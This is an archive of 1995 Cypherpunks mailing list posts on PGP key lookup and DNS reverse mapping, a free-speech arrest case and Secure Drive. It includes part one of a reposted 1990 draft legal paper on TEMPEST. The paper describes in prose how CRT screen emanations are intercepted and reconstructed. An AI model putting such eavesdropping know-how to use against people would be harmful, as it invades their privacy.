He *didn't* !  There's an enormous difference between making a comment about
a person to third parties, and making the comment to that person.

According to the NY Times story, the woman mentioned in the story only heard
about it because reporters asked her about it !  I find a great deal of irony
in the report that the controversy started because an alt.sex.stories reader
in _Moscow_ tipped off the UMich authorities.

It appears that the Russians are allowed to read erotic fiction, while the
Americans are forbidden to read it, and get tossed in jail for writing it.
We've come a long way, baby. Yeah.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sat, 11 Feb 95 13:47:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NYT on Cybertheft and Sex Writer
In-Reply-To: <199502111435.JAA26507@pipe1.pipeline.com>
Message-ID: <199502112149.QAA12793@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
> Peter Lewis writes on the U Mich student arrested for posting 
> fictional rough sex story.

Thanks once again for making this material available, John.

I must object to your thumbnail sketch of this story, though. The story as
described in the NY Times article does not involve "rough sex" -- it involves
rape, and the distinction is crucial.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nately.UCSD.EDU (Anonymous)
Date: Sat, 11 Feb 95 16:57:12 PST
To: cypherpunks@toad.com
Subject: TEMPEST Paper by Former Civilian (1/2)
Message-ID: <9502120100.AA14610@nately.UCSD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



For those interested in TEMPEST, below is a draft paper written 5 years ago
by Christopher Seline.  Mr Seline's new E-mail address ends with
"DOCKMASTER.NCSC.MIL",  so any attempts to query him about TEMPEST are
guaranteed to go unanswered.  I hope he still feels the same about TEMPEST
now that he has changed employers.  
 

Date: Fri, 19 Jan 90 19:13:44 -0500
From: cjs%cwru@cwjcc.ins.cwru.edu (Christopher J. Seline (CJS@CWRU.CWRU.EDU))

The following is a prepublication draft of an article on TEMPEST.  I am posting
it to this news group in the hope that it will:
        (1) stimulate discussion of this issue;
        (2) expose any technical errors in the document;
        (3) solicit new sources of information;
        (4) uncover anything I have forgotten to cover.

I will be unable to monitor the discussions of the article.  Therefore, PLEASE
post your comments to the news group BUT SEND ME A COPY AT THE ADDRESS LISTED
BELOW.

I have gotten a number of mail messages about the format of this
article.  Some explanation is in order:  The numbered paragraphs
following "____________________" on each page are footnotes.  I suggest
printing out the document rather than reading it on your CRT.

Thanks you in advance.

Christopher Seline
cjs@cwru.cwru.edu
cjs@cwru.bitnet

(c) 1990 Christopher J. Seline
=============================================================================
<Start Print Job>
<New Page>
                                Eavesdropping On 
                         the Electromagnetic Emanations 
                              of Digital Equipment:
                               The Laws of Canada,
                          England and the United States

                           This  document is  a rough
                           draft.        The    Legal
                           Sections  are   overviews.
                           T h e y    w i l l     b e
                           significantly expanded  in
                           the next version.

               We in this country, in this generation, are -- by
               destiny rather than choice -- the watchmen on the
               walls of world freedom.[1]
                                             -President John F.
          Kennedy

          _____________________              

          1.  Undelivered  speech  of  President  John  F.  Kennedy, Dallas
          Citizens Council (Nov. 22, 1963) 35-36.

<New Page>
                    In the novel 1984, George Orwell foretold a future
          where individuals had no expectation  of privacy because the
          state monopolized the technology of  spying.  The government
          watched the actions of its subjects from birth to death.  No
          one could protect himself because  surveillance and counter-
          surveillance technology was controlled by the government.
               This note explores  the legal status of  a surveillance
          technology  ruefully  known  as  TEMPEST[2].    Using  TEMPEST
          technology  the  information in  any  digital device  may be
          intercepted  and  reconstructed  into   useful  intelligence
          without the  operative ever having to come  near his target.
          The technology is  especially useful in the  interception of
          information  stored  in  digital computers  or  displayed on
          computer terminals.
               The use of TEMPEST is not illegal under the laws of the
          United  States[3],  or  England.    Canada has  specific  laws
          criminalizing TEMPEST eavesdropping but the  laws do more to
          hinder surveillance countermeasures than to prevent  TEMPEST
          surveillance.  In  the United  States it is  illegal for  an
          individual  to  take   effective  counter-measures   against
          TEMPEST surveillance.  This  leads to the conundrum that  it
          is legal  for individuals and  the government to  invade the
          privacy of others but illegal for  individuals to take steps
          to protect their privacy.
               The author would  like to suggest that the  solution to
          this   conundrum   is  straightforward.      Information  on
          _____________________              

          2.  TEMPEST  is an  acronym for  Transient Electromagnetic  Pulse
          Emanation Standard.   This standard sets forth the official views
          of the United  States on the amount  of electromagnetic radiation
          that a device may emit without compromising the information it is
          processing.   TEMPEST  is  a defensive  standard; a  device which
          conforms to this standard is referred to as TEMPEST Certified.
               The United States  government has refused to  declassify the
          acronym  for  devices  used   to  intercept  the  electromagnetic
          information of  non-TEMPEST Certified  devices.   For this  note,
          these  devices  and  the  technology  behind  them  will  also be
          referred  to as  TEMPEST;  in  which  case,  TEMPEST  stands  for
          Transient Electromagnetic Pulse Surveillance Technology.
               The  United  States  government refuses  to  release details
          regarding TEMPEST and continues an organized effort to censor the
          dissemination of  information  about it.    For example  the  NSA
          succeeded in shutting  down a  Wang Laboratories presentation  on
          TEMPEST Certified equipment  by classifying  the contents of  the
          speech and threatening  to prosecute  the speaker with  revealing
          classified information.  [cite coming].  

          3.  This  Note  will not  discuses  how  TEMPEST relates  to  the
          Warrant Requirement under  the United  States Constitution.   Nor
          will it discuss the Constitutional exclusion of foreign nationals
          from the Warrant Requirement. 

<New Page>
          protecting  privacy  under  TEMPEST should  be  made  freely
          available;  TEMPEST  Certified equipment  should  be legally
          available; and organizations possessing  private information
          should  be  required  by  law  to protect  that  information
          through  good  computer security  practices  and the  use of
          TEMPEST Certified equipment.

                            I. INTELLIGENCE GATHERING
               Spying is divided by professionals into two main types:
          human   intelligence   gathering  (HUMINT)   and  electronic
          intelligence gathering (ELINT).  As  the names imply, HUMINT
          relies   on   human   operatives,   and  ELINT   relies   on
          technological operatives.   In the past HUMINT  was the sole
          method  for collecting intelligence.[4]   The HUMINT operative
          would  steal  important  papers, observe  troop  and  weapon
          movements[5],  lure people  into  his confidences  to  extract
          secrets,  and   stand  under   the  eavesdrip[6]   of  houses,
          eavesdropping on the occupants.  
               As  technology  has progressed,  tasks that  once could
          only  be  performed  by  humans  have  been  taken  over  by
          machines.  So  it has  been with spying.   Modern  satellite
          technology allows troop and weapons movements to be observed
          with greater  precision and  from greater  distances than  a
          human  spy  could ever  hope to  accomplish.   The  theft of
          documents  and  eavesdropping on  conversations  may now  be
          performed electronically.  This means greater safety for the
          human operative, whose  only involvement may be  the placing
          of  the  initial  ELINT  devices.    This  has  led  to  the
          ascendancy of ELINT  over HUMINT  because the placement  and
          _____________________              

          4.  HUMINT  has  been  used  by  the   United  States  since  the
          Revolution.   "The necessity  of procuring  good intelligence  is
          apparent &  need not be further urged --  All that remains for me
          to add is, that you keep the  whole matter as secret as possible.
          For  upon Secrecy,  Success depends  in Most  Enterprises of  the
          kind, and for  want of it,  they are generally defeated,  however
          well planned &  promising a favorable  issue."  Letter of  George
          Washington (Jul. 26, 1777).

          5.  "... I wish  you to take every possible pains in your powers,
          by  sending  trusty persons  to  Staten  Island in  whom  you can
          confide,  to  obtain  Intelligence  of  the Enemy's  situation  &
          numbers --  what kind of  Troops they are,  and what  Guards they
          have -- their strength & where posted."  Id.

          6.  Eavesdrip is  an Anglo-Saxon  word,  and refers  to the  wide
          overhanging eaves used  to prevent rain  from falling close to  a
          house's foundation.   The eavesdrip  provided "a sheltered  place
          where  one  could hide  to  listen clandestinely  to conversation
          within the house."   W. MORRIS & M. MORRIS,  MORRIS DICTIONARY OF
          WORD AND PHRASE ORIGINS, 198 (1977).

<New Page>
          monitoring of ELINT devices may be performed by a technician
          who has  no training  in the  art of spying.   The  gathered
          intelligence  may be  processed by  an intelligence  expert,
          perhaps  thousands of  miles  away, with  no  need of  field
          experience.  
               ELINT has a number of other advantages over HUMINT.  If
          a  spy is caught his existence could embarrass his employing
          state and he could  be forced into giving up  the identities
          of his compatriots  or other important information.   By its
          very nature, a discovered ELINT device (bug)  cannot give up
          any information; and the ubiquitous  nature of bugs provides
          the  principle  state  with the  ability  to  plausibly deny
          ownership or involvement.
               ELINT   devices   fall  into   two   broad  categories:
          trespassatory  and  non-trespassatory.   Trespassatory  bugs
          require some type of trespass in order for them to function.
          A transmitter  might require  the physical  invasion of  the
          target  premises  for placement,  or  a microphone  might be
          surreptitiously attached  to  the outside  of a  window.   A
          telephone transmitter can  be placed  anywhere on the  phone
          line, including at the  central switch.  The trespass  comes
          either when it is physically attached  to the phone line, or
          if it is  inductive, when placed  in close proximity to  the
          phone line.   Even microwave  bugs require the  placement of
          the resonator cone within the target premises.[7]
               Non-trespassatory  ELINT  devices  work   by  receiving
          electromagnetic radiation (EMR) as  it radiates through  the
          aether, and do not  require the placement of bugs.   Methods
          include intercepting[8] information transmitted  by satellite,
          microwave, and  radio, including mobile  and cellular  phone
          transmissions.   This information was  purposely transmitted
          with the intent that  some intended person or  persons would
          receive it.  
               Non-trespassatory ELINT also includes  the interception
          of information that  was never  intended to be  transmitted.
          All electronic devices emit electromagnetic radiation.  Some
          of  the  radiation,  as  with radio  waves,  is  intended to
          transmit  information.    Much  of  this  radiation  is  not
          intended to transmit information and is merely incidental to

          _____________________              

          7.  Pursglove, How  Russian Spy  Radios Work,  RADIO ELECTRONICS,
          89-91 (Jan 1962).

          8.  Interception  is  an  espionage  term of  art  and  should be
          differentiated from  its more common usage.   When information is
          intercepted, the interceptor  as well  as the intended  recipient
          receive the information.  Interception when not used as a term of
          art refers to one person receiving something intended for someone
          else; the intended recipient never receives what he  was intended
          to receive.

<New Page>
          whatever  work  the  target  device  is performing.[9]    This
          information  can be  intercepted  and reconstructed  into  a
          coherent  form.    With  current  TEMPEST technology  it  is
          possible to  reconstruct  the  contents  of  computer  video
          display  terminal  (VDU)  screens  from  up to  a  kilometer
          distant[10];  reconstructing  the  contents  of  a  computer's
          _____________________              

          9.  There are  two types  of emissions,  conducted and  radiated.
          Radiated  emissions are formed  when components or  cables act as
          antennas for transmit the EMR; when radiation is conducted  along
          cables or other connections but not radiated it is referred to as
          "conducted".  Sources  include cables,  the ground loop,  printed
          circuit boards, internal  wires, the power  supply to power  line
          coupling, the cable to cable coupling, switching transistors, and
          high-power  amplifiers.    WHITE  &  M. MARDIGUIAN,  EMI  CONTROL
          METHODOLOGY AND PROCEDURES,   10.1 (1985).
               "[C]ables  may act  as an  antenna to  transmit the  signals
          directly  or  even  both  receive the  signals  and  re-emit them
          further away  from the  source equipment.   It  is possible  that
          cables acting as an  antenna in such a manner could  transmit the
          signals  much  more  efficiently than  the  equipment  itself...A
          similar  effect  may occur  with metal  pipes  such as  those for
          domestic water supplies. ...  If an earthing [(grounding)] system
          is  not installed  correctly such  that there  is a  path  in the
          circuit  with a  very high  resistance (for  example  where paint
          prevents  conduction and  is acting  as an  insulator), then  the
          whole earthing  system could well act in  a similar fashion to an
          antenna. ...   [For a  VDU] the strongest  signals, or  harmonics
          thereof, are  usually between  60-250 MHz  approximately.   There
          have  however  been  noticeable  exception  of  extremely  strong
          emissions  in  the  television bands  and  at  higher frequencies
          between 450-800  MHz.  Potts,  Emission Security, 3  COMPUTER LAW
          AND SECURITY REPORT 27 (1988).

          10.  The TEMPEST ELINT operator can distinguish between different
          VDUs  in   the   same  room   because   of  the   different   EMR
          characteristics of both  homo and heterogeneous units.   "[T]here
          is little comparison  between EMR characteristics  from otherwise
          comparable equipment.   Only if the  [VDU] was made with  exactly
          the  same components  is there  any similarity.   If some  of the
          components have come from a different batch, have been updated in
          some   way,  and  especially   if  they  are   from  a  different
          manufacturer, then completely different results are obtained.  In
          this way a  different mark or version of the same [VDU] will emit
          different  signals.   Additionally  because  of the  variation of
          manufacturing standards between counties, two  [VDUs] made by the
          same  company  but  sourced  from  different counties  will  have
          entirely different EMR signal characteristics...From this  it way
          be thought that there is such a jumble of emissions  around, that
          it would not be possible to isolate those from any one particular
          source.  Again, this is not the case.  Most received signals have

<New Page>
          memory or the contents  of its mass storage devices  is more
          complicated and must be performed  from a closer distance.[11]
          The reconstruction  of information  via EMR,  a process  for
          which the  United States  government  refuses to  declassify
          either  the  exact  technique or  even  its  name[12], is  not
          limited to computers  and digital devices but  is applicable
          to  all devices  that generate  electromagnetic radiation.[13]
          TEMPEST is  especially effective  against VDUs  because they
          produce a very high level of EMR.[14]
          _____________________              
                                                                           
          a  different  line synchronization,  due  to  design, reflection,
          interference or  variation of component  tolerances.  So  that if
          for  instance  there  are three  different  signals  on the  same
          frequency  ...  by  fine  tuning  of  the  RF  receiver,  antenna
          manipulation  and modification  of  line synchronization,  it  is
          possible to lock onto each of the three signals separately and so
          read  the  screen information.    By  similar techniques,  it  is
          entirely  possible  to discriminate  between individual  items of
          equipment in the same room."  Potts, supra note 9.
               For  a discussion  of  the TEMPEST  ELINT  threat See  e.g.,
          Memory Bank, AMERICAN BANKER 20 (Apr 1 1985); Emissions from Bank
          Computer Systems  Make Eavesdropping Easy,  Expert Says, AMERICAN
          BANKER  1  (Mar  26 1985);  CRT  spying:  a  threat to  corporate
          security, PC WEEK (Mar 10 1987).

          11.  TEMPEST is  concerned  with  the  transient  electromagnetic
          pulses formed  by digital  equipment.   All electronic  equipment
          radiates  EMR  which  may be  reconstructed.    Digital equipment
          processes information as 1's and 0's--on's  or off's.  Because of
          this, digital equipment  gives off pulses  of EMR.  These  pulses
          are easier to  reconstruct at a  distance than the non-pulse  EMR
          given off by  analog equipment.   For a  thorough discussion  the
          radiation  problems  of  broadband digital  information  see e.g.
          military standard MIL-STD-461   REO2; White supra note 9,   10.2.

          12.  See supra note 2.

          13.       Of special interest  to ELINT  collectors are EMR  from
          computers,  communications   centers  and  avionics.     Schultz,
          Defeating Ivan with TEMPEST, DEFENSE ELECTRONICS 64 (June 1983). 

          14.     The  picture on  a  CRT screen  is  built up  of  picture
          elements  (pixels) organized  in lines  across the  screen.   The
          pixels  are made  of material  that fluoresces  when struck  with
          energy.  The energy is produced by a beam of electrons fired from
          an electron gun  in the back of  the picture tube.   The electron
          beam scans the screen of the  CRT in a regular repetitive manner.
          When the voltage of the beam is high then the pixel it is focused
          upon  emits  photons and  appears as  a  dot on  the screen.   By
          selectively firing  the gun as  it scans across  the face of  the
          CRT, the pixels form characters on the CRT screen.
<New Page>
               ELINT is not limited to  governments.  It is  routinely
          used by  individuals for  their  own purposes.   Almost  all
          forms of ELINT are  available to the individual with  either
          the technological  expertise or  the money  to hire  someone
          with  the  expertise.     Governments   have  attempted   to
          criminalize all use  of ELINT by their  subjects--to protect
          the privacy of both the government and the population.

                              II. UNITED STATES LAW
               In the United States, Title III of  the Omnibus Streets
          and Crimes Act of 1968[15] criminalizes trespassatory ELINT as
          the intentional interception  of wire communications.[16]   As
          originally  passed,   Title  III   did  not  prohibit   non-

          _____________________              
                                                                           
               The pixels  glow for  only a  very  short time  and must  be
          routinely struck by the electron beam  to stay lit.  To  maintain
          the light output of  all the pixels that are supposed  to be lit,
          the electron beam traverses  the entire CRT screen sixty  times a
          second.   Every time the beam fires it  causes a high voltage EMR
          emission.  This EMR  can be used  to reconstruct the contents  of
          the  target CRT  screen.   TEMPEST  ELINT  equipment designed  to
          reconstruct the information synchronizes its  CRT with the target
          CRT.  First, it uses the EMR to synchronize its electron gun with
          the electron gun in the target CRT.  Then, when the TEMPEST ELINT
          unit detects EMR indicating that the target CRT fired on a pixel,
          the TEMPEST ELINT  unit fires the electron  gun of its CRT.   The
          ELINT CRT is in perfect synchronism with the target CRT; when the
          target lights a pixel, a corresponding pixel on the TEMPEST ELINT
          CRT  is lit.  The exact picture on  the target CRT will appear on
          the TEMPEST ELINT  CRT.  Any changes on the target screen will be
          instantly reflected in the TEMPEST ELINT screen. 
               TEMPEST Certified equipment gives off emissions  levels that
          are too faint to  be readily detected.  Certification  levels are
          set   out  in   National   Communications  Security   Information
          Memorandum  5100A   (NACSIM  5100A).    "[E]mission   levels  are
          expressed in the time  and frequency domain, broadband or  narrow
          band  in terms of the frequency domain, and in terms of conducted
          or radiated emissions."  White, supra, note 9,   10.1.
               For a  thorough  though purposely  misleading discussion  of
          TEMPEST ELINT see  Van Eck, Electromagnetic Radiation  from Video
          Display units: An Eavesdropping Risk?, 4 Computers & Security 269
          (1985).

          15.   Pub. L.  No. 90-351,  82 Stat. 197.   The Act  criminalizes
          trespassatory  ELINT  by  individuals  as  well  as  governmental
          agents.  cf.  Katz v. United States, 389 U.S. 347  (1967) (Fourth
          Amendment prohibits surveillance by government not individuals.) 

          16.  18 U.S.C.   2511(1)(a).

<New Page>
          trespassatory  ELINT,[17] because  courts found  that non-wire
          communication lacked any expectation of p2IIIrivacy.[18]   The
          Electronic Communications  Privacy  Act  of  1986[19]  amended
          Title  III  to  include non-wire  communication.    ECPA was
          specifically  designed  to include  electronic  mail, inter-
          computer  communications,  and  cellular  telephones.     To
          accomplish  this,  the  expectation  of  privacy   test  was
          eliminated.[20]
               As  amended, Title  III  still outlaws  the  electronic
          interception of  communications.  The  word "communications"
          indicates  that   someone  is   attempting  to   communicate
          something to someone; it  does not refer to the  inadvertent
          transmission   of   information.       The   reception   and
          reconstruction of emanated transient  electromagnetic pulses
          (ETEP), however, is based on  obtaining information that the
          target does  not  mean to  transmit.   If  the ETEP  is  not
          intended as communication, and  is therefore not transmitted
          in a form approaching current communications protocols, then
          it can not  be considered communications as  contemplated by
          Congress  when  it   amended  Title  III.     Reception,  or
          interception, of emanated  transient electromagnetic  pulses
          is not criminalized by Title III as amended.

                                III. ENGLISH LAW
               In  England  the  Interception  of  Communications  Act
          1985[21] criminalizes the tapping of  communications sent over

          _____________________              

          17.  United States v. Hall,  488 F.2d 193 (9th Cir.  1973) (found
          no legislative history  indicating Congress  intended the act  to
          include radio-telephone conversations).  Further,  Title III only
          criminalized  the interception  of  "aural" communications  which
          excluded all forms of computer communications.  

          18.  Willamette  Subscription Television  v.  Cawood, 580  F.Supp
          1164 (D. Or. 1984) (non-wire communications lacks any expectation
          of privacy).

          19.  Pub. L. No. 99-508, 100 Stat. 1848 (codified at 18 U.S.C.   
          2510-710) [hereinafter ECPA].

          20.  18 U.S.C.   2511(1)(a) criminalizes the interception of "any
          wire,  oral  or electronic  communication"  without regard  to an
          expectation of privacy.

          21.  Interception of Communications Act 1985,  Long Title, An Act
          to make new provision for and in connection with the interception
          of  communications  sent   by  post   or  by   means  of   public
          telecommunications  systems  and  to  amend  section  45  of  the
          Telecommunications Act 1984.

<New Page>
          public  telecommunications  lines.[22]   The  interception  of
          communications on  a telecommunication line  can take  place
          with a physical tap on the line, or the passive interception
          of microwave or  satellite links.[23]  These  forms of passive
          interception  differ  from TEMPEST  ELINT  because  they are
          intercepting   intended    communication;   TEMPEST    ELINT
          intercepts unintended  communication.  Eavesdropping  on the
          emanations  of  computers does  not  in any  way  comport to
          tapping a telecommunication line and therefore falls outside
          the scope of the statute.[24]

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 11 Feb 95 17:06:32 PST
To: cypherpunks@toad.com
Subject: Re: Does PGP scale well?
In-Reply-To: <9502112237.AA17845@snark.imsi.com>
Message-ID: <199502120105.RAA20992@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I was just reading RFC1034 about DNS, and one thing I noted was that there is a
"reverse lookup" feature.  This allows you to go from, say, 156.151.1.101
to portal.com.  This problem seems similar in some ways to the key lookup
problem since you have a relatively unstructured number and you want to
use it as a lookup key.

According to the RFC, if you want to know what host machine is at
address 156.151.1.101, you do a lookup of 156.151.1.101.IN-ADDR.ARPA.
The RFC did not make it very clear how this is done.  Does this use a
"flat" database?    Is it distributed in some way?  Or has this method
perhaps been superceded by some other?

I can see that the key problem is worse than the reverse lookup problem
because there are many more users than hosts.  Although in the long run
won't everybody have a computer at home that has an IP address?  Will the
nameserver hierarchy run into problems then?  There is no obvious
hierarchical arrangement as we have now with our .edu and .com sites,
unless we go geographical.  This seems analogous to the PEM/RSA key
certificate hierarchy problem.  In any case the reverse lookup problem
seems like it will be difficult then.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 11 Feb 95 14:26:05 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Does PGP scale well?
Message-ID: <ab62e915050210045172@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:53 PM 02/11/95, Tom Jones wrote:
>One of the reasons that I consider this to be untrue is my empirical
>experience with two groups that are constantly interested in exactly
>who I am: the government and the credit bureaus.  They both chose to
>use my SSN even though that has all the same attributes of a KeyID,
>except that it is somewhat denser.  Now if this is what happens when
>the real world tries to identify me, why is the KeyID such a bad way to
>identify keys?

It seems like it might be important to note, however, that the government
identification systems are definitely _centrazilized_ modes of information
storage and distribution.  Credit buearues are less obviously centralized,
but still perhaps centralized.  And it could be argued that credit bureaus
would never have used a system like social security numbers for
identification if it hadn't already been in widespread use in the
centralized governmental systems which created it.

This is in sharp contrast to the decentralized mode that we want our
encryption and authorization to function in.  This is for
anti-authoritarian reasons, as well as simply practical reasons.  When the
government is involved, it can mandate that everyone use the system they
are in control of, and they can get the neccesary manpower to actually
implement a centralized system too.  But we don't want to have to trust any
one authority, and we also want a system where everyone does their own work
(like DNS, where every domain has it's own server), if possible.

Conventional wisdom is that PGP is inherently decentralized, and it is, in
a sense, and in it's current web-of-trust model.  But a
social-security-number model of key distribution would definitely _not_ be
centralized.  You are assigned your social security number by a central
authority, and others can look up your social security number by consulting
with that central authority, or with other authorities that have themselves
consulted with the central authority.  That's not a model most of us think
desirable for PGP key distribution.

[It also could be noted that a SSN has some contained meaning, where a PGP
keyid doesn't.  The prefixes on your SSN say what state (and maybe even
what county, I'm not sure) you were born in.  But generally this isn't very
useful information, so this probably isn't an important point.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 11 Feb 95 14:38:00 PST
To: A5113643667@attpls.net (Tom Jones)
Subject: Re: Does PGP scale well?
In-Reply-To: <9811968B>
Message-ID: <9502112237.AA17845@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Jones says:
> Perry has repeated a litany here that I have been hearing for years on
> the pem-dev list with never a hint of a justification.  That is that
> PGP does not scale well.

I've given plenty of justification. You can't reverse map keys. Isn't
that bad enough?

> One of the reasons that I consider this to be untrue is my empirical
> experience with two groups that are constantly interested in exactly
> who I am: the government and the credit bureaus.  They both chose to
> use my SSN even though that has all the same attributes of a KeyID,
> except that it is somewhat denser.

Ahem.

Next you'll tell us that the hosts.txt database was a great idea and
you see no reason why we should have built the DNS. After all, host
addresses are only 32 bits, so the problem of mapping them into
hostnames should be easy to do in a flat database, right?

If you'd like to volunteer to run the centralized databases containing
the (at least) five billion keys for the population of the planet,
including handling tens to hundreds of billions of hits against them
per day, and probably tens of millions of updates per day (perhaps
you'd like us to enter them by hand, too?) and you'd like to supply
this service for free, then we will certainly be willing to talk.

Until you volunteer, however, leave the engineering to the people with
some experience in building large scale systems?


Perry

(Sure, TRW can store 100 million records in a giant database and index
them purely by a single unstructured number. 'taint cheap or fast,
however, and it certainly isn't amenable to decentralized maintainance
of the data.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gary Jeffers" <CCGARY@MIZZOU1.missouri.edu>
Date: Sat, 11 Feb 95 15:26:37 PST
To: cypherpunks@toad.com
Subject: Secure Drive ver. & loc. ?
Message-ID: <199502112322.SAA09620@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear Cypherpunks,
   Does anyone know where the latest version of SECURE DRIVE really is
& what the latest version is?
                                           Yours Truly,
                                           Gary Jeffers
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz1GuyoZzwIn1bdtAQFCrwF/ZH4w9VdubpZRH8JPRDm+N56aMNVg3riW
EcVCDcsWaTUUqFB8E1fazTfJSL2mAgEP
=eE7u
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sat, 11 Feb 95 17:56:25 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: law vs technology
In-Reply-To: <199502102253.RAA10658@ducie.cs.umass.edu>
Message-ID: <199502120156.UAA27335@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


L. Futplex McCarthy's reply to Wei Dei:

[ Snip! ]

> As a separate issue, there are quite a few vocal opponents of groups such as
> EFF on the list. I've no idea whether there's a silent majority ;) of lurkers
> who fully support EFF et al., but I suspect a sizable chunk of the list
> population disagrees that there are many people really fighting invasive govt.
> action.

There's an advantage of techies getting politically active, provided they
can explain the systems in an understandable way that is interesting, and
provided that these issues hit home to them (ie, that you're not talking
in technobabble and that they see the need for privacy technologies in
their own lives).

What I find harder to do is to get through to people who have given up on
the government not eroding what little rights remain, or who are already
afriad that the FBI/CIA/NSA/KGB/etc. are already watching their every move.

I'm working on a fax to send to congresspersons as a start. I'd like to
get local political action groups hip to the issues as well to get the ball
rolling in the right direction as well.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Sat, 11 Feb 95 19:18:29 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: Does PGP scale well?
In-Reply-To: <199502120105.RAA20992@jobe.shell.portal.com>
Message-ID: <199502120318.VAA27650@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Hal <hfinney@shell.portal.com>
> 
> I was just reading RFC1034 about DNS, and one thing I noted was that
> there is a "reverse lookup" feature.  This allows you to go from, say,
> 156.151.1.101 to portal.com.  This problem seems similar in some ways to
> the key lookup problem since you have a relatively unstructured number
> and you want to use it as a lookup key.
[...]
> According to the RFC, if you want to know what host machine is at
> address 156.151.1.101, you do a lookup of 156.151.1.101.IN-ADDR.ARPA.
> The RFC did not make it very clear how this is done. [...]

Actually you do a lookup on 101.1.151.156.in-addr.arpa, it is reversed
because of the way addresses are structured.  This is part of the
problem with PGP keys and DNS: PGP key IDs are unstructured and randomly
distributed, IP addresses are not really unstructured and thier
distribution is not random.  A reverse lookup (aka "pointer query") happens
the same way as a regular name lookup, it just reverses the order of the
bytes in the IP address and then resolves it in the same method as a
regular name, from the least specific to most specific parts of the
address. 

With a PGP key ID there is no order to the distribution of the IDs, so it
is not like one could delegate authority for bits in a key ID the same way
taht one can with bits/bytes in an IP address.  The inability to delgate
chunks of the key ID space is what will prevent lookups by keyID; no one
can run a single server that has all the IDs and the organizational
problems with delegating random chunks of the keyID-space are fairly obvious
(e.g. in the DNS model you are responsible for your own address space and
it is in your own self-interest to make sure that it works, the same cannot
be said of keyID-space)

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Sat, 11 Feb 95 13:53:51 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Does PGP scale well?
Message-ID: <9811968B>
MIME-Version: 1.0
Content-Type: text


Perry has repeated a litany here that I have been hearing for years on
the pem-dev list with never a hint of a justification.  That is that
PGP does not scale well.

One of the reasons that I consider this to be untrue is my empirical
experience with two groups that are constantly interested in exactly
who I am: the government and the credit bureaus.  They both chose to
use my SSN even though that has all the same attributes of a KeyID,
except that it is somewhat denser.  Now if this is what happens when
the real world tries to identify me, why is the KeyID such a bad way to
identify keys?

Please note that I do understand that identifying me and finding me are
separate issues.  I'm not sure that the pem-dev folk clearly
discriminate these.

Peace. Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 11 Feb 95 22:16:29 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Does PGP scale well?
In-Reply-To: <199502120105.RAA20992@jobe.shell.portal.com>
Message-ID: <9502120616.AA18409@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal says:
> I was just reading RFC1034 about DNS, and one thing I noted was that
> there is a "reverse lookup" feature.  This allows you to go from,
> say, 156.151.1.101 to portal.com.  This problem seems similar in
> some ways to the key lookup problem since you have a relatively
> unstructured number and you want to use it as a lookup key.
> 
> According to the RFC, if you want to know what host machine is at
> address 156.151.1.101, you do a lookup of 156.151.1.101.IN-ADDR.ARPA.

No, you got that wrong. You do a lookup on 101.1.151.156.IN-ADDR.ARPA
-- note the component reversal. The reversal is very key.

> The RFC did not make it very clear how this is done.  Does this use a
> "flat" database?

No. Its fully distributed. The fact that networks are assigned in
heirarchical chunks should explain how its done, and why the bytes get
reversed for the lookup. As an example, MIT owns network 18, which is
to say that all MIT addresses are 18.XXX.XXX.XXX, and 18.IN-ADDR.ARPA
is a server at MIT. MIT may have sub-servers beyond that level, but
DNS makes us oblivious to this.

For IPv6, the reverse lookup is going to be segregated at the nybble
boundaries rather than at the byte boundaries because of CIDR style
classless allocation. The domain will be IP6.INT rather than IN-ADDR.ARPA

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Sun, 12 Feb 95 02:25:38 PST
To: cypherpunks@toad.com
